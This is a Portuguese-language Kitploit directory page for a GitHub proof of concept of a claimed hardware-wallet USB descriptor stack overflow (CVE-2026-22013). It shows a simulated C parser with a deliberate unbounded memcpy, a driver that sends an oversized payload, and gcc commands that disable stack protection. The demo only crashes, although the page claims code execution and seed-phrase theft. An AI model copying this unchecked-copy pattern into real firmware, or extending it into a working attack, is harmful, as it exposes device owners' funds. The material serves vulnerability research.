Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow — PoC de estouro de buffer de pilha para um analisador de descritores USB de carteira de hardware (CVE-2026-22013), mostrando sobrescrita de endereço de retorno e execução de código por meio de payload GET_DESCRIPTOR superdimensionado. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow
Segurança de Sistemas EmbarcadosAnálise de VulnerabilidadesExploraçãoHacking de HardwareSegurança de HardwareExploração de Binários
GitHubgeorge0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow

CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC de estouro de buffer de pilha para um analisador de descritores USB de carteira de hardware (CVE-2026-22013), mostrando sobrescrita de endereço de retorno e execução de código por meio de payload GET_DESCRIPTOR superdimensionado.

Ver Repositório
5há 1 mêsAinda não revisado

CVE-2026-22013 – Estouro de Buffer no Descritor USB de Carteira de Hardware

Código do Programa (simulação de firmware em C)

root@kitploit:~
// hw_wallet_usb.c - USB descriptor parsing with fixed buffer
#include <string.h>
void handle_usb_setup(char *data, int len) {
    char descriptor[32];
    if (len > 0 && data[0] == 0x06) { // GET_DESCRIPTOR
        // Copy descriptor payload without bounds check
        memcpy(descriptor, data+1, len-1);  // overflow if len>33
    }
}
int main() {
    char malicious[64];
    memset(malicious, 'A', 63);
    malicious[0] = 0x06;
    handle_usb_setup(malicious, 64);
    return 0;
}

CVE-2026-22013 – Estouro de Buffer no Descritor USB de Carteira de Hardware

Severity: Critical

Visão Geral

A pilha USB de uma carteira de hardware apresenta um estouro de buffer na pilha ao analisar uma solicitação GET_DESCRIPTOR com uma carga útil superdimensionada. Um atacante com acesso USB físico pode explorar isso para sobrescrever o endereço de retorno e obter execução de código, extraindo frases-semente.

Detalhes da Vulnerabilidade

  • Tipo: Estouro de Buffer na Pilha
  • Impacto: Comprometimento total do dispositivo, extração da semente.
  • Causa Raiz: O campo de comprimento do descritor não é validado antes da cópia para um buffer de tamanho fixo.

Demonstração do Exploit

Compile para a arquitetura de destino e execute (simulação):

root@kitploit:~
gcc -o hw_wallet_usb hw_wallet_usb.c -fno-stack-protector
./hw_wallet_usb

O programa falha devido à corrupção da pilha.

Baixar ferramenta